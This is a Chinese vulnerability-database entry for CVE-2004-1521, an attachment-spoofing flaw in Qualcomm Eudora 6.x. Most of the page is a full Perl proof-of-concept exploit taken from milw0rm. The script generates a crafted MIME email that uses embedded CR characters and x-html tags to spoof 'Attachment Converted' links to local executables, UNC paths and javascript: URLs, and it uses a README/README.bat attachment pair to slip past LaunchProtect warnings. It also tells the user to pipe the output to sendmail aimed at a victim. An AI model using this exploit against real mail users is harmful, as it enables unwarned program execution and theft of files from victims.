Eudora信息泄漏漏洞
漏洞ID | 1107806 | 漏洞类型 | 未知 |
发布时间 | 2004-03-19 | 更新时间 | 2004-12-31 |
CVE编号 | CVE-2004-1521 |
CNNVD-ID | CNNVD-200412-600 |
漏洞平台 | Windows | CVSS评分 | 5.0 |
|漏洞来源
|漏洞详情
Eudora6.2.0.14版本在用户转送包含基于64位或引用可打印编码附件的邮件信息时不能发布警告。远程攻击者可以借助”Converted”头文件轻松读取任意文件。
|漏洞EXP
#!/usr/bin/perl --
use MIME::Base64;
print "From: men";
print "To: youn";
print "Subject: Eudora 6.0.3 on Windows spoof, LaunchProtectn";
print "MIME-Version: 1.0n";
print "Content-Type: multipart/mixed; boundary="zzz"n";
print "n";
print "This is a multi-part message in MIME format.n";
print "--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";
print "Pipe the output of this script into: sendmail -i victimn";
print "nWith spoofed attachments, we could 'steal' files if the
message
was forwarded (not replied to).n";
print "nWithin plain-text email (or plain-text, inline MIME parts)
embedded
CR=x0d characters get converted internally into a NUL=x00 and ignored,
so we can spoof "attachment converted" lines:n";
print "nThe following work fine (but are boring and/or put up
warnings):n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";
print "Attachment Convertedr: c:\winnt\system32\calc.exen";
print "(Note how JavaScript is done with IE, web with default browser
Netscape)n";
print "Attachment Convertedr: <A
href=javascript:alert(%27hello%27)>hello.txt</a>n";
print "Attachment Convertedr: <A
href=http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx>web.txt</a>n";
print "Attachment Convertedr: <A
href=c:/winnt/system32/calc.exe>file.txt</a>n";
print "nIf we can guess the full path to the attach directory then can
change the name shown to anything we like, but get broken icon:n";
print "Attachment Convertedr: <A
href=H:/eudora/attach/calc>file.txt</a>n";
print "nCuteness value only:n";
print "Attachment Convertedr: <A
href=c:/winnt/system32/calc.exe>file1.txt</a> xyz <A href=c:/winnt/system32/calc.exe>file2.txt</a>n";
print "n<x-html>
With <b>HTML</b> <i>inclusions</i> we can do
<a href=c:/winnt/system32/calc.exe>file</a>,
<a
href="http://www.maths.usyd.edu.au:8000/u/psz/securepc.html#Eudoraxx">http</a>
and
<a href="javascript:alert(x27hellox27)">javascript</a>
references. Any way to exploit this?
</x-html>n";
print "n<x-rich>
Can also do RTF inclusions. Can this be abused?
</x-rich>n";
print "nThose <x-xyz></x-xyz> constructs allow spoofing
attachments easily, without embedded CR:nn";
print "HTMLn";
print "<x-html></x-html>Attachment Converted: "xyz"n";
print "Richn";
print "<x-rich></x-rich>Attachment Converted: "xyz"n";
print "Flowedn";
print "<x-flowed></x-flowed>Attachment Converted: "xyz"n";
print "n";
print "n--zzzn";
print "Content-Type: text/plain; name="plain.txt"n";
print "Content-Transfer-Encoding: 7bitn";
print "Content-Disposition: inline; filename="plain.txt"n";
print "n";
print "Within a 'plain' attachment:n";
print "Attachment Convertedr: "c:\winnt\system32\calc.exe"n";
print "n--zzzn";
print "Content-Type: text/plain; name="qp.txt"n";
print "Content-Transfer-Encoding: quoted-printable n";
print "Content-Disposition: inline; filename="qp.txt"n";
print "n";
print "Within quoted-printable encoded parts still need the embedded
CR:n";
print "=41ttachment=20=43onvertedr=3a
"c:\winnt\system32\calc.exe"n";
print "n--zzzn";
print "Content-Type: text/plain; name="b64.txt"n";
print "Content-Transfer-Encoding: base64n";
print "Content-Disposition: inline; filename="b64.txt"n";
print "n";
$z = "Within base64 encoded (plain-text, inline) MIME parts, can
spoofr
without embedded CR (but line termination is CR-NL):r
Attachment Converted: "c:\winnt\system32\calc.exe"rn";
print encode_base64($z);
print "n--zzzn";
print "Content-Type: text/plainn";
print "Content-Transfer-Encoding: 7bitn";
print "n";
print "n=====n";
$X = 'README'; $Y = "$X.bat";
print "nThe X - X.exe dichotomy: send a plain $X attachment:n";
$z = "rem Funny jokernpausern";
print "begin 600 $Xn", pack('u',$z), "`nendn";
print "nand (in another message or) after some blurb so is scrolled
off in
another screenful, also send $Y. Clicking on $X does not
get it any more (but gets $Y, with a LauchProtect warning):n";
$z = "rem Big jokernrem Should do something nastyrnpausern";
print "begin 600 $Yn", pack('u',$z), "`nendn";
print "n=====n";
print "
Eudora 6.0.3 LaunchProtect handles the X-X.exe dichotomy in the attach
directory only, and allows spoofed attachments pointing to an
executable
stored elsewhere to run without warning:n";
print "Attachment Convertedr: <a
href=c:/winnt/system32/calc>go.txt</a>n";
print "Attachment Convertedr: c:/winnt/system32/calcn";
print "
Can be exploited if there is more than one way into attach: in my setup
H: and \\rome\home are the same thing, but Eudora does not know
that.n";
print "These elicit warnings:n";
print "Attachment Convertedr: <a
href=h:/eudora/attach/README>readme.txt</a>n";
print "Attachment Convertedr: h:/eudora/attach/READMEn";
print "Attachment Convertedr: \READMEn";
print "Attachment Convertedr: .\READMEn";
print "Attachment Convertedr: \.\READMEn";
print "Attachment Convertedr: ?\READMEn";
print "Attachment Convertedr: \?\READMEn";
print "while these do the bad thing without warning:n";
print "Attachment Convertedr: <a
href=file://rome/home/eudora/attach/README>readme</a>n";
print "Attachment Convertedr: //rome/home/eudora/attach/READMEn";
print "Attachment Convertedr:
\\rome\home\eudora\attach\READMEn";
print "
For the default setup, Eudora knows that C:\Program Files
and C:\Progra~1 are the same thing:n";
print "Attachment Convertedr: "c:/program
files/qualcomm/eudora/attach/README"n";
print "Attachment Convertedr:
"c:/progra~1/qualcomm/eudora/attach/README"n";
print "
and also knows that various UNC references:
\\localhost\c...
\\127.0.0.1\c...
\\BIOSNAME\c...
\\DNSNAME\c...
\\IP\c...
\\\?\c...
\\c...
...c:\progr...
...c\progr...
...c:progr...
...program files\...
...progra~1\...
or even
.\NoSuchDir\..\README
//c|\Program Files\qualcomm\eudora\attach\README
\\c|\Program Files\qualcomm\eudora\attach\README
res://c:\Program Files\qualcomm\eudora\attach\README
res:\\c:\Program Files\qualcomm\eudora\attach\README
shell:Fonts\..\..\Program Files\qualcomm\eudora\attach\README
%ProgramFiles%\qualcomm\eudora\attach\README
%windir%\..\Program Files\qualcomm\eudora\attach\README
are all the same thing...
";
print "n";
print "n--zzz--n";
print "n";
# milw0rm.com [2004-03-19]
|受影响的产品
Qualcomm Eudora 6.2.0.14
|参考资料
来源:XF
名称:eudora-base64-attach-spoof-variant(18064)
链接:http://xforce.iss.net/xforce/xfdb/18064
来源:packetstormsecurity.nl
链接:http://packetstormsecurity.nl/0411-exploits/eudora62014.txt
来源:NTBUGTRAQ
名称:20041113Eudora6.2attachmentspoof
链接:http://marc.theaimsgroup.com/?l=ntbugtraq&m;=110053102601655&w;=2
来源:BUGTRAQ
名称:20041113Eudora6.2attachmentspoof
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=110037078519691&w;=2
相关推荐: Tlen.pl Instant Messenger Remote Script Execution Vulnerability
Tlen.pl Instant Messenger Remote Script Execution Vulnerability 漏洞ID 1097384 漏洞类型 Input Validation Error 发布时间 2004-12-20 更新时间 2004…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666